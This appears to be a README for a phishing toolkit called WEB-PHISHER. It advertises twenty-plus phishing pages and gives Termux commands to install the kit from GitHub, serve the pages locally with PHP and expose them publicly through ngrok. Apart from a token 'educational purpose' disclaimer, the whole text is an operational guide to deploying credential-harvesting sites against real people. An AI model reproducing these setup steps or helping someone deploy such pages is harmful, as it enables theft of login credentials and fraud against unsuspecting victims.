THE ADVANCED WEB-PHISHING TOOL
This tool is only for educational purpose. If you use this tool for other purposes except education we will not be responsible in such cases.
- 20+ advanced phishing pages !
- 3 Port Forwarding Option !
- No link issues, timing !
- Server hosting available !
- Easy for Beginners to advanced !
- termux
- internet 50 MB
- php
- storage 100 MB
- ngrok Token
apt update
apt upgrade
pkg install git
pkg install zip
pkg install php
git clone https://github.com/phpmanickam/WEB-PHISHER.git
cd WEB-PHISHER
ls
unzip WEB-PHISHER.zip
ls
php -S localhost:1234
## Open new session in termux:
* ex:(start the ngrok server with 1234 port)
* Now open ngrok website and crete a account
* Download ngrok in your terminal
* cd
* ./ngrok http 1234
pkg install git && pkg install php && pkg install zip && git clone https://github.com/phpmanickam/WEB-PHISHER.git && cd WEB-PHISHER && unzip WEB-PHISHER.zip && ls && php -S localhost:1234
[+]-- open another section
cd && ./ngrok http 1234